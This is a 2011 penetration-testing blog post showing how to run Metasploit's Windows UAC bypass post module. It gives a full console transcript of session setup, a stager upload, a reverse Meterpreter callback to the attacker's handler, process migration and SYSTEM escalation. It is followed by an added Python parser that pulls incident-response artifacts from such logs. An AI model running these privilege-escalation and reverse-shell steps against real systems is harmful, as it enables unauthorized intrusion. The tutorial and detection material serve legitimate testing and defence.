January 06, 2011
Windows UAC Bypass now in Metasploit!
Written by
David Kennedy
Penetration Testing
Security Testing & Analysis
The Windows UAC bypass was committed to the Metasploit Framework today. Running it is a bit different from running a traditional meterpreter script: instead of interacting with meterpreter and executing the commands from the meterpreter shell, you use the new post/ modules from the msf console, pointed at an existing session. Below is how to use it:
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:1989) at Thu Jan 06 12:40:35 -0500 2011
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     no        Host
   RPORT    4444             no        Port
   SESSION                   yes       The session to run this module on.
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit
[*] Started reverse handler on 172.16.32.128:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint 172.16.32.128:4444 with UACBypass in effect...
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1993) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (172.16.32.128:4444 -> 172.16.32.130:1993) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)
msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer: DAVE-DEV-PC
OS : Windows 7 (Build 7600, ).
Arch : x64 (Current Process is WOW64)
Language: en_US
meterpreter >
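As an added example (not part of the original post or of Metasploit itself), the following Python parser turns a console transcript like the one above into structured per-session records. The sample transcript embedded in it is constructed from the lines shown on this page; the point is to pull out what a responder would want from such a log: the listener and target endpoints, the size of the stager dropped on disk, the randomly named process it first ran as, and the process it migrated into.

```python
"""Parse an msfconsole transcript into per-session records (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample transcript, modelled on the console output shown on this page.
TRANSCRIPT = """\
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:1989) at Thu Jan 06 12:40:35 -0500 2011
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1993) at Thu Jan 06 12:41:13 -0500 2011
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)
...got system (via technique 1).
"""

SESSION_RE = re.compile(r"session (\d+) opened \((\S+) -> (\S+)\) at (.+)$")
PROC_RE = re.compile(r"(Current|New) server process: (\S+) \((\d+)\)")
UPLOAD_RE = re.compile(r"stager executable (\d+) bytes")


@dataclass
class Session:
    sid: int
    listener: str            # attacker-side handler (ip:port)
    target: str              # victim-side endpoint (ip:port)
    opened_at: str
    dropped_bytes: Optional[int] = None            # size of the stager written to disk
    processes: List[Tuple[str, int]] = field(default_factory=list)  # (name, pid) chain
    got_system: bool = False


def parse_transcript(text: str) -> Dict[int, Session]:
    """Attribute each console line to the most recently opened session."""
    sessions: Dict[int, Session] = {}
    current: Optional[Session] = None
    for line in text.splitlines():
        if m := SESSION_RE.search(line):
            sid = int(m.group(1))
            current = sessions[sid] = Session(sid, m.group(2), m.group(3), m.group(4))
        elif current is None:
            continue  # output before any session opened; nothing to attribute it to
        elif m := UPLOAD_RE.search(line):
            current.dropped_bytes = int(m.group(1))
        elif m := PROC_RE.search(line):
            current.processes.append((m.group(2), int(m.group(3))))
        elif "got system" in line:
            current.got_system = True
    return sessions


def migration_chain(session: Session) -> List[str]:
    """Process names the implant ran inside, in order; the first is the dropped stager."""
    return [f"{name} ({pid})" for name, pid in session.processes]
```

The dropped executable name and the migration into notepad.exe are the host-side artifacts worth carrying into an incident report or a detection rule.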